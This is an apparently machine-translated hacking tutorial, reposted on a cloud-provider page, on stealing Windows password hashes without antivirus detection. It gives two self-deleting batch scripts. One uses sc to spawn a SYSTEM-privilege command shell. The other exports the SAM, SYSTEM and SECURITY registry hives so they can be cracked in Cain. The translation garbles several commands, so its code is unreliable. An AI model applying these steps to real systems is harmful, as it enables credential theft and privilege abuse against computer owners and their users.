Export the system registry to capture the Hash

Source: Internet
Author: User

I saw an article about exporting the Registry to break the password forever. This is a good news for a lot of hash-grabbing tools that have been killed and won't be killed by yourself, in fact, this was a long time ago. It seems that it was proposed by a foreigner, but it did not attract attention.

The author said that this method is not kill:

Windows 2000 SP4 (admin) = access denied
Windows XP SP2 (admin) = access denied
Windows XP SP3 (admin) = access denied
Windows 2003 R2 SP2 (admin) = works
Windows Vista SP2 (UAC/admin) = works
Windows 2008 SP1 (admin) = works
Windows 7 (UAC/admin) = works

There are requirements on user permissions. By default, XP SP3 cannot be exported. I tested it locally, but the system permission is acceptable. Then we can create a CMD with the system permission to run, and then export it.

You have not tested other systems.

First, create a CMD for executing the system permission:

================================== StartSystemCmd. bat ==========

SC Create systemcmd binPath = "cmd/K start" type = own type = interact
SC start systemcmd
SC delete systemcmd
Del % 0

========================================================== ==========

Then export the file.

========================== SaveReg. bat ====================================

@ Echo off
Reg save hklmsam sam. hive
Reg save hklmsystem system. hive
Reg save hklmsecurity security. hive
Del % 0

============================================================ ============

And then pour it into the CAIN.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.